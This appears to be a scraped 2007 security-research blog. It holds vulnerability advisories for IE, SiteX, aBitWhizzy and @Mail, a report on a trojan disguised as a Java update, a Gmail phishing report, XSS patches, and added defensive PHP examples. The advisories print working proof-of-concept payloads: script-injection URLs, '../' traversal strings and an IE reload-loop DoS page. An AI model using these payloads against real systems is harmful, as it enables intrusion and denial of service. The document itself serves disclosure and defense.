http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c<br />
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h<br />
http://source.winehq.org/source/dlls/ntdll/file.c<br />
The links to ntdll.c and ntdll.h are apparently dead; you can try<br />
to search for them in Google's cache, sorry for the inconvenience.<br />
<br />
###############################€nd#########################<br />
<br />
Thnx To estrella for being my light.<br />
Thnx To FalconDeOro; he investigated and documented this issue with me.<br />
Thnx to Icaro and the Badchecksum Team for their interest in the research.<br />
Thnx To Jkouns and Jericho for their patience.<br />
Thnx to all the OSVDB manglers; they are involved in a very nice project.<br />
Thnx to the Secunia Research Team; they do very good co-work with researchers<br />
and put in my hands all that I needed in this and other research.<br />
Thnx to all of Lostmon's Group Team.<br />
Thnx to Microsoft for the responses.<br />
<br />
--<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-36707590591563623262007-06-02T04:58:00.000-07:002007-06-02T11:03:49.105-07:00Trojan posing as a Java updateIn recent days an e-mail has been circulating<br />in which we are told of a security flaw in Java.<br /><br />From that same e-mail we are urged to download the update that<br />will fix the security problem.<br /><br />On going to the download site, which apparently resembles the<br />Sun Microsystems download site, a file called install_javav6up2.exe<br />is downloaded, which contains a trojan.<br /><br />If we get a quick report on the file we see that even the file's<br />version information has been faked so that it appears to be from Sun.<br />The message includes several URLs that come from a server which<br />has most likely already been compromised.<br /><br />http://201.22.57.XX/JAVA/_software/update/index.php?request=Update&program=java<br />http://201.22.57.XX/JAVA/_software/update/index.php?USUARIO=5B3U6H843N45E82<br />http://201.22.57.XX/JAVA/_software/download/get.php?license=5B3U6H843N45E82&mode=manual<br /><br />##################<br />File analysis<br 
/>####################<br /><br /><br />********************************************************************<br />FileAlyzer © 2003-2005 Patrick M. Kolla. All Rights Reserved.<br />********************************************************************<br /><br /><br />File: C:\Documents and Settings\Lostmon\Escritorio\install_javav6up2.exe<br />Date: 02/06/2007 2:04:08<br /><br /><br />***** General ******************************************************<br />Ubicación: C:\Documents and Settings\Lostmon\Escritorio\<br />Tamaño: 192512<br />Versión: 1.2.5.2<br />CRC-32: 93EEBEE2<br />MD5: 70CACC3D64585343F6AA04C3135BA24B<br />SHA1: 20E9C0990D76AB1E8CF84C9425B3F64365E94926<br />Sólo lectura: No<br />Oculto: No<br />Archivo del sistema: No<br />Carpeta de archivos: No<br />Archivo: Yes<br />Enlace simbólico: No<br />Time stamp: sábado, 02 de junio de 2007 11:31:36<br />Creado: sábado, 02 de junio de 2007 11:31:34<br />Último acceso: sábado, 02 de junio de 2007 2:01:16<br />Modificado: sábado, 02 de junio de 2007 11:31:36<br /><br /><br />***** Versión ******************************************************<br />Idiomas soportados:: Portugués (Brasil) (1046/1252)<br />--- Versión --------------------------------------------------------<br />Versión del archivo: 1.2.5.2<br />Empresa: Java<br />Nombre interno:<br />Comentarios:<br />Copyright:<br />Marcas registradas:<br />Nombre original: instal_plugin98MEXP.exe<br />Nombre del producto:<br />Versión del producto: 2.0.0.0<br />Descripción: Sun Microsystems Corporation - Arquivo de atualização<br />Versión privada:<br />Versión especial:<br /><br /><br />***** Recursos *****************************************************<br />--- Cursor ---------------------------------------------------------<br />1<br />2<br />3<br />4<br />5<br />6<br />7<br />--- Bitmap ---------------------------------------------------------<br />BBABORT<br />BBALL<br />BBCANCEL<br />BBCLOSE<br />BBHELP<br />BBIGNORE<br />BBNO<br />BBOK<br 
/>BBRETRY<br />BBYES<br />PREVIEWGLYPH<br />--- Icon -----------------------------------------------------------<br />1<br />2<br />--- Dialog ---------------------------------------------------------<br />DLGTEMPLATE<br />--- String Table ---------------------------------------------------<br />4081<br />4082<br />4083<br />4084<br />4085<br />4086<br />4087<br />4088<br />4089<br />4090<br />4091<br />4092<br />4093<br />4094<br />4095<br />4096<br />--- RCData ---------------------------------------------------------<br />DVCLAL<br />PACKAGEINFO<br />TXTREM<br />--- Cursor Group ---------------------------------------------------<br />32761<br />32762<br />32763<br />32764<br />32765<br />32766<br />32767<br />--- Icon Group -----------------------------------------------------<br />MAINICON<br />--- Version Info ---------------------------------------------------<br />1<br /><br /><br />***** Cabecera PE **************************************************<br />Signature: 00004550<br />Machine: 014C - Intel 386<br />Number of sections: 0008<br />Time/Date stamp: 2A425E19<br />Pointer to symbol table: 00000000<br />Number of symbols: 00000000<br />Size of optional header: 00E0<br />Characteristics: 818E<br />Magic: 010B<br />Linker version (major): 02<br />Linker version (minor): 19<br />Size of code: 00000000<br />Size of initialized data: 0000E800<br />Size of uninitialized data: 00000000<br />Address of entry point: 00064BD6<br />Base of code: 00001000<br />Base of data: 00050000<br />Image base: 00400000<br />Section alignment: 00001000<br />File alignment: 00000200<br />OS version (major): 0004<br />OS version (minor): 0000<br />Image version (major): 0000<br />Image version (minor): 0000<br />Sub system version (major): 0004<br />Sub system version (minor): 0000<br />Win32 version: 00000000<br />Size of image: 00066000<br />Size of headers: 00000400<br />Checksum: 000308BA<br />Sub system: 0002 - Windows graphical user interface (GUI) subsystem<br />DLL 
characteristics: 0000<br />Size of stack reserve: 00100000<br />Size of stack commit: 00004000<br />Size of heap reserve: 00100000<br />Size of heap commit: 00001000<br />Loader flags: 00000000<br />Number of RVA: 00000010<br /><br /><br />***** Secciones PE *************************************************<br />CRC-32: 7059EB4D<br />MD5: 83C09E84F35E245A0ADA5CC66D4C9B3B<br />----- Secciones PE -------------------------------------------------<br />Sección TamañoVirt. DirecciónVirt. TamañoFís. TamañoFís. Parámetros<br />0004F000 00001000 00028600 00000400 C0000040<br />00002000 00050000 00000A00 00028A00 C0000040<br />00001000 00052000 00000000 00029400 C0000040<br />00002000 00053000 00000E00 00029400 C0000040<br />00001000 00055000 00000000 0002A200 C0000040<br />00007000 00056000 00000200 0002A200 C0000040<br />.rsrc 00006000 0005D000 00002400 0002A400 C0000040<br />00003000 00063000 00002800 0002C800 C0000040<br /><br /><br />***** Importar/Exportar tabla **************************************<br />--- Export table ---------------------------------------------------<br />--- Import table (libraries: 2) ------------------------------------<br />kernel32.dll (imports: 1)<br />GetModuleHandleA<br />user32.dll (imports: 1)<br />MessageBoxA<br /><br />################## €nd #############<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-82094048097158779602007-04-25T12:52:00.000-07:002007-04-28T13:27:02.295-07:00Internet Explorer Body tag recoverable DoS issue#####################################################<br />
Internet Explorer Body tag recoverable DoS issue<br />
Vendor url:http://www.microsoft.com<br />
Advisory:http://lostmon.blogspot.com/2007/04/posible-ie7-dos.html<br />
Vendor notify:YES Vendor confirmed:YES Exploit include:YES<br />
#####################################################<br />
<br />
Microsoft Internet Explorer contains a flaw that may allow a<br />
malicious user to cause IE7 to enter a loop in which IE7<br />
becomes unresponsive, resulting in a recoverable DoS issue.<br />
(Only the process in which we open the file is affected.) The user<br />
can only terminate the process.<br />
<br />
The result in Internet Explorer is that the browser seems to "hang".<br />
I have not discovered a way to leverage the "hang" to gain<br />
execution of arbitrary code.<br />
<br />
############<br />
versions<br />
############<br />
<br />
Tested on all of these versions:<br />
<br />
#########<br />
IE7<br />
#########<br />
<br />
Windows Vista =>vulnerable<br />
Windows XP SP2 =>vulnerable<br />
Windows XP Home SP2 =>vulnerable<br />
<br />
#########<br />
IE6<br />
#########<br />
<br />
Windows 2000 => Not vulnerable ?<br />
Windows XP SP2 =>vulnerable<br />
Windows XP Home SP2 =>vulnerable<br />
<br />
############<br />
Solution<br />
############<br />
<br />
Microsoft is working on an<br />
updated version, patch or similar.<br />
<br />
#############<br />
Timeline<br />
#############<br />
<br />
Discovered:29-01-2007<br />
Vendor notify: 11-03-2007<br />
Vendor response:11-03-2007<br />
Private Disclosure:07-02-2007<br />
Public Disclosure: 25-04-2007<br />
<br />
#########################<br />
IE7 and 6 Body tag PoC<br />
#########################<br />
<br />
###################<br />
Source of eso.pl<br />
###################<br />
<br />
print "<html>\n";<br />
print "<head>";<br />
print "<title>";<br />
print "Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)";<br />
print "</title>";<br />
print "</head>";<br />
print "<body onload='location.reload()'>";<br />
print "<p><a href='http://lostmon.blogspot.com/'>";<br />
print "Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)";<br />
print "</a></p>";<br />
print "</body>";<br />
print "</html>";<br />
<br />
##############################<br />
Source of eso.html<br />
##############################<br />
<br />
print "<html>\n"<br />
print "<head>"<br />
print "<title>"<br />
print "Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)"<br />
print "</title>"<br />
print "</head>"<br />
print "<body onload='location.reload()'>"<br />
print "<p><a href='http://lostmon.blogspot.com/'>"<br />
print "Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)"<br />
print "</a></p>"<br />
print "</body>"<br />
print "</html>"<br />
<br />
###############################<br />
Source of eso.htm<br />
###############################<br />
<br />
<html><br />
<head><br />
<title><br />
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)<br />
</title><br />
</head><br />
<body onload='location.reload()'><br />
<p><a href='http://lostmon.blogspot.com/'><br />
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)<br />
</a><br />
</p><br />
</body><br />
</html><br />
<br />
################################<br />
<br />
#######################End###################<br />
<br />
Special thnx to the Secunia Research Team; they made me<br />
understand what this was about and put in my hands !!!ALL!!!<br />
what I needed for this research !!!!<br />
Secunia:http://www.secunia.com/<br />
<br />
Thnx To estrella because you are always in my thoughts<br />
even when we do not agree, and for planting in me the seed<br />
of curiosity, night after night !!<br />
<br />
Thnx To FalconDeOro:<br />
patience is a virtue, young Jedi !!<br />
Thanks for your help and support :*<br />
<br />
Thnx to all the Microsoft Security Response Center,<br />
especially Annette.<br />
http://www.microsoft.com/technet/security/<br />
<br />
--<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....</div>

Final patch For SiteX 0.7.3 beta XSS flaws
Posted by Lostmon, 2007-04-21T02:06:00.000-07:00 (updated 2007-04-28T13:28:33.890-07:00)

####################################################
Patch for SiteX 0.7.3 beta XSS flaws
vendor url: http://sitex.bjsintay.com/
original article: http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html
####################################################

Patch for all of these related vulns:

http://osvdb.org/displayvuln.php?osvdb_id=33158
http://osvdb.org/displayvuln.php?osvdb_id=33159
http://osvdb.org/displayvuln.php?osvdb_id=33160

All of the files we edit include this file:

'includes/functions.php'

Open this file and add a new function around line 12-13:

#####################################################
// stop XSS function to mitigate the possible XSS flaws
// use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\","`","´"), "", $text);
return $text;

}
####################################################

Change this code:
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars, will be over-written
#####################################################
for this other:
#####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will be over-written
#####################################################

SiteX is full of XSS flaws; all variables are affected.

########################
OSVDB ID: 33158
########################
calendar.php
Cross-Site Scripting in variables $sxMonth and $sxYear fixed !!

########################
OSVDB ID: 33159
########################
search.php
Cross-site scripting in $search fixed !!

########################
OSVDB ID: 33160
########################
redirect.php
Cross-Site scripting in $linkid fixed !!

#####################################################

It also fixes these variables:

- albumid and page upon submission to album.php
- error upon submission to login.php
- type upon submission to search.php
- sxEntryID upon submission to journal.php
- photoid, albumid and page upon submission to photo.php
- forumid and topicid upon submission to forums_topic.php

###################################################
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....

Possible patch for SiteX
Posted by Lostmon, 2007-04-14T11:16:00.000-07:00 (updated 2007-04-21T03:24:49.216-07:00)

Hello !

vendor url: http://sitex.bjsintay.com/

Specific entry: http://sourceforge.net/tracker/index.php?
func=detail&aid=1700736&group_id=121558&atid=690690

osvdb id: 33158 (http://osvdb.org/displayvuln.php?osvdb_id=33158),
33159 (http://osvdb.org/displayvuln.php?osvdb_id=33159),
33160 (http://osvdb.org/displayvuln.php?osvdb_id=33160),
33161 (http://osvdb.org/displayvuln.php?osvdb_id=33161)

http://archives.neohapsis.com/archives/bugtraq/2007-02/0477.html

http://www.securityfocus.com/archive/1/archive/1/461305/100/0/threaded

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1234

After studying these vulns I found a simple possible patch.

Some other params are affected, like albumid upon submit to album.php,
the username box upon submission to login.php, the search box upon submission
to search.php and multiple other params.

Most of those flaws could be solved by a simple "emergency" patch
before the vendor releases an update or a patch.

Open includes/functions.php

Around line 12-13 we have this code:
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars, will be over-written
##################################################


You can change it for this other:

##################################################

// stop XSS function to mitigate the possible XSS flaws
// use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}

// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = StopXSS($v);
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will be over-written

#########################################################

and most of the XSS flaws are now solved :D

This patch is explained and updated here:

http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html

Thnx for your time !!!

Thnx to OSVDB !!!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....
<div class="blogger-post-footer">
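As an added example (not SiteX code and not from either SiteX patch post above), the script below shows two things a maintainer applying the StopXSS patch should know. First, the filter passes each request value straight to strip_tags(), which PHP expects to be a string, so an array-valued parameter (for instance cal[]=Home&cal[]=Work, the form used by the PHP iCalendar advisory further down this page) is not filtered element by element; a recursive walk fixes that. Second, a blacklist filter on input also mangles legitimate values such as O'Brien, which is why escaping with htmlspecialchars() at the point of output is the more reliable complement. The names StopXSSRecursive, encodeForHtml, importRequest and $sampleGet, and all request values, are constructed for this example.

```php
<?php
// Added example (not SiteX code): a recursive variant of the post's StopXSS
// filter plus output encoding. Plain PHP >= 7.0; the request data below is
// constructed sample input, not captured traffic.

// The post's filter, applied recursively so that array-valued parameters
// (e.g. cal[]=Home&cal[]=Work) are filtered element by element instead of
// being handed to strip_tags() as a whole array.
function StopXSSRecursive($value)
{
    if (is_array($value)) {
        // array_map with a single array keeps the original keys.
        return array_map('StopXSSRecursive', $value);
    }
    $text = (string) $value;
    // Same three steps as the post: drop <script ... script> spans, then any
    // remaining tag, then the characters used to break out of attributes.
    $text = preg_replace('/(<script)(.*?)(script>)/si', '', $text);
    $text = strip_tags($text);
    $text = str_replace(array("'", '"', '>', '<', '\\', '`', '´'), '', $text);
    return $text;
}

// Output encoding: escaping where a value is written into HTML keeps
// legitimate input intact and neutralises it regardless of its source.
function encodeForHtml($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Replacement for the register_globals emulation loop in the post: request
// values go into a scoped array rather than into $$k, so a request cannot
// overwrite the script's own variables, and every value is filtered once.
function importRequest(array $get, array $cookie)
{
    $vars = array();
    foreach (array($get, $cookie) as $source) {
        foreach ($source as $k => $v) {
            $vars[$k] = StopXSSRecursive($v);
        }
    }
    return $vars;
}

// Constructed sample request using parameter names from the post.
$sampleGet = array(
    'sxMonth' => '4',
    'search'  => '"><script>alert(1)</script>',
    'linkid'  => "O'Brien <b>bold</b>",
    'cal'     => array('Home', '<img src=x onerror=alert(1)>'),
);

$vars = importRequest($sampleGet, array());

foreach ($vars as $name => $value) {
    // What the patched SiteX code would see after input filtering ...
    $filtered = is_array($value) ? implode(' | ', $value) : $value;
    // ... and what the raw value looks like once encoded for HTML output.
    $raw = $sampleGet[$name];
    $encoded = is_array($raw)
        ? implode(' | ', array_map('encodeForHtml', $raw))
        : encodeForHtml($raw);
    printf("%-8s filtered: %-20s encoded: %s\n", $name, $filtered, $encoded);
}
```

Run it with the PHP CLI. The filtered column shows the blacklist removing the payloads but also turning O'Brien into OBrien, while the encoded column shows the same raw values rendered harmless without loss; in a patched SiteX the two belong together, filtering on input and encoding on output.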
</div>

aBitWhizzy traversal folder enumeration and XSS
Posted by Lostmon, 2007-03-27T10:36:00.000-07:00 (updated 2007-05-18T13:02:18.436-07:00)

################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisory: http://lostmon.blogspot.com/2007/03/
abitwhizzy-traversal-folder-enumeration.html
vendor notify: YES exploit included: YES
OSVDB ID: 34505 (http://osvdb.org/displayvuln.php?osvdb_id=34505),
34506 (http://osvdb.org/displayvuln.php?osvdb_id=34506),
34507 (http://osvdb.org/displayvuln.php?osvdb_id=34507),
34508 (http://osvdb.org/displayvuln.php?osvdb_id=34508)
Secunia: SA24679 (http://secunia.com/advisories/24679/)
FrSIRT: FrSIRT/ADV-2007-1136 (http://www.frsirt.com/english/advisories/2007/1136)
BID: 23167 (http://www.securityfocus.com/bid/23167)
################################################

aBitWhizzy is a PHP script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser.
Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).

aBitWhizzy contains a flaw that allows remote traversal
arbitrary folder enumeration. This flaw exists because the
application does not validate the 'd' variable upon submission
to the 'whizzylink.php', 'whizzypic.php', 'whizzery/whizzypic.php'
and 'whizzery/whizzylink.php' scripts. This could allow a
remote user to create a specially crafted URL that would
execute '../' directory traversal characters to view the folder
structure on the target system with the privileges
of the target web service.

This input validation error also permits cross-site scripting
style attacks and full path disclosure.

###################
VERSIONS
###################

Unknown version of aBitWhizzy

##################
SOLUTION
##################

No solution was available at this time !!

######################
TIMELINE
######################

discovered: 25-03-2007
vendor notify: 25-03-2007
vendor response: ---------
Private Disclosure: 25-03-2007
public disclosure: 27-03-2007

#######################
Examples
#######################

Path disclosure:

http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='

Folder enumeration:

http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings

Cross Site Scripting:

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>

########################### €nd ###################################

Thnx to Estrella, I love you lots ;P
Thnx to all Lostmon's Group Team

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....
<div class="blogger-post-footer">
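The advisory above lists no fix. As an added example that is not aBitWhizzy code, the script below shows the check a maintainer would put in front of a directory parameter like 'd': resolve the requested name with realpath() and accept it only when the canonical result stays inside a fixed base directory, and answer a rejected or nonexistent request with a fixed message so that no PHP warning containing the server path reaches the browser. The names resolveWithin and listDirectoryOrError, the base directory and the sample values are assumptions for this example; the demo directory is created in the system temp directory by the script and removed again.

```php
<?php
// Added example (not aBitWhizzy code): containing a user-supplied directory
// name inside a fixed base directory. Plain PHP >= 5.3; the directories used
// below are created by this script in the system temp dir and removed again.

// Returns the canonical path of $userDir inside $baseDir, or false if the
// requested path does not exist or escapes the base directory.
function resolveWithin($baseDir, $userDir)
{
    $base = realpath($baseDir);
    if ($base === false) {
        return false; // the base directory itself must exist
    }
    // A NUL byte would truncate the path in the underlying C call.
    if (strpos($userDir, "\0") !== false) {
        return false;
    }
    // realpath() collapses '..' and symlinks, so the containment check is
    // made on what the filesystem would actually open.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userDir);
    if ($candidate === false) {
        return false; // nonexistent, e.g. d=' or a traversal to nowhere
    }
    // Compare with a trailing separator so that a sibling whose name merely
    // starts with the base name (images2 next to images) is not accepted.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $base && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $candidate;
}

// What a script such as whizzypic.php would do with the result: list the
// directory on success, otherwise answer with a fixed message so that no
// warning containing the server path is echoed to the client.
function listDirectoryOrError($baseDir, $userDir)
{
    $dir = resolveWithin($baseDir, $userDir);
    if ($dir === false) {
        return 'Invalid folder.';
    }
    $entries = array_diff(scandir($dir), array('.', '..'));
    return implode(', ', $entries);
}

// Constructed demo: a base directory with one subfolder and one file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'whizzy_demo_' . getmypid();
$pics = $base . DIRECTORY_SEPARATOR . 'pics';
mkdir($pics, 0700, true);
touch($pics . DIRECTORY_SEPARATOR . 'logo.gif');

// Valid names, the base itself, a nonexistent name, and two escapes.
$requests = array('pics', 'pics/../pics', '', "'", '../../../../etc', 'pics/../..');
foreach ($requests as $d) {
    printf("d=%-20s -> %s\n", var_export($d, true), listDirectoryOrError($base, $d));
}

// Clean up the demo directory.
unlink($pics . DIRECTORY_SEPARATOR . 'logo.gif');
rmdir($pics);
rmdir($base);
```

The two escape attempts and the quote-only name all come back as "Invalid folder." while the in-base names list their contents; with display_errors left on, the same nonexistent names would otherwise surface as warnings that print the absolute path, which is the path disclosure the advisory describes.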
</div>

Fake Gmail e-mail tries to deceive its users
Posted by Lostmon, 2007-02-27T11:59:00.000-08:00 (updated 2007-02-27T12:27:12.904-08:00)

Lostmon reports to us the circulation of a fraudulent e-mail that
aims to steal the passwords of Gmail users, as well as downloading
a malicious file.

Although the site has already been shut down, it is good to always
be alert to this kind of scam, since it is very common for them to
reappear periodically with small variations.

In this case, the message has been distributed as spam, pretending
to come from Gmail. It states that "due to the increase of viruses
on the networks," our account will be cancelled unless we download
and run a tool that supposedly "will free us from these vermin".

--- Part of the text of the original message ---

Gmail Privacy Notice
Gmail Privacy Policy

31 January 2007

To continue using our Gmail service, before signing in to your e-mail
or Orkut you will have to download our security file, due to the large
number of viruses on the network; should you disregard this notice,
your e-mail will automatically be cancelled within 30 working days
by our system.

According to Lostmon's analysis, the links and other addresses in the
message point to domains that have nothing to do with Gmail, but the
e-mail and the fake sites have been carefully built to pass as Google's.

The spam appears to originate from Brazil; the fake pages were hosted
on free hosting servers, while the fake tool was downloaded from a
Russian server (that file no longer exists).

This type of message is also often used to distribute trojans such as
Win32/Spy.Banker, malware capable of stealing confidential information
related to the bank accounts of those who fall for the scam.

As always, it is recommended not to follow links or open attachments
from unsolicited messages, regardless of their origin.


More information:

Gmail users are in danger once again

http://groups.google.com/group/lostmon/
http://groups.google.com/group/lostmon/browse_thread/thread/da8453d7e73d6e97

Article written by Angela Ruiz (angela@videosoft.net.uy)
Article URL: http://vsantivirus.com/spam-gmail-27-02-07.htm
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

@Mail Search.pl keywords variable cross-site scripting
Posted by Lostmon, 2007-02-13T10:42:00.000-08:00 (updated 2007-02-14T12:01:41.077-08:00)

#########################################################
@Mail Search.pl keywords variable cross-site scripting
vendor url: http://www.atmail.com
Advisory: http://lostmon.blogspot.com/2007/02/
mail-searchpl-keywords-variable-cross.html
vendor notify: yes exploit available: yes
Secunia: SA24155 (http://secunia.com/advisories/24155/)
BID: 22552 (http://www.securityfocus.com/bid/22552)
FrSIRT: ADV-2007-0603 (http://www.frsirt.com/english/advisories/2007/0603)
#########################################################


@Mail is a feature-rich email solution that allows users to access
email resources via the web or a variety of wireless devices.
The software incorporates a complete email-server package to manage
and host user email at your domain(s).


@Mail contains a flaw that allows a remote cross-site scripting
attack. This flaw exists because the application does not validate
user input in the search form in html/[language folder]/help/search.html
upon submission to the search.pl script; the keywords variable is also
affected by this flaw upon submission to the search.pl script. This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.


#############
versions
#############
All of these versions are vulnerable:

@mail 4.61
@mail 4.6
@mail 4.51
@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /

It is also possible that other versions are vulnerable.

#################
solution
#################

No solution was available at this time !!!

#################
Timeline
#################

Discovered: 02-07-2005
vendor notify: 11-02-2007
vendor response: --------
disclosure: 13-02-2007


###############
Examples
###############

Go to:

http://localhost/parse.pl?file=html/english/help/search.html

and insert in the search form this script:

"><script>alert(document.forms.keywords)</script>

or exploit directly to search.pl:

http://localhost/search.pl?func=searchhelp&keywords=
"><script>alert(document.forms.keywords)</script>&Submit2=Search

######################## €nd ##########################

Thnx to Estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon/ (new)
--
Curiosity is what moves the mind....

PHP icalendar multiple variable cross site scripting
Posted by Lostmon, 2006-12-27T13:35:00.002-08:00 (updated 2010-04-18T08:10:41.164-07:00)

#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url: http://phpicalendar.net/
Advisory: http://lostmon.blogspot.com/2006/12/
php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included: YES
OSVDB ID: 32493 (http://osvdb.org/displayvuln.php?osvdb_id=32493),
32494 (http://osvdb.org/displayvuln.php?osvdb_id=32494),
32495 (http://osvdb.org/displayvuln.php?osvdb_id=32495),
32496 (http://osvdb.org/displayvuln.php?osvdb_id=32496),
32497 (http://osvdb.org/displayvuln.php?osvdb_id=32497),
32498 (http://osvdb.org/displayvuln.php?osvdb_id=32498),
32499 (http://osvdb.org/displayvuln.php?osvdb_id=32499),
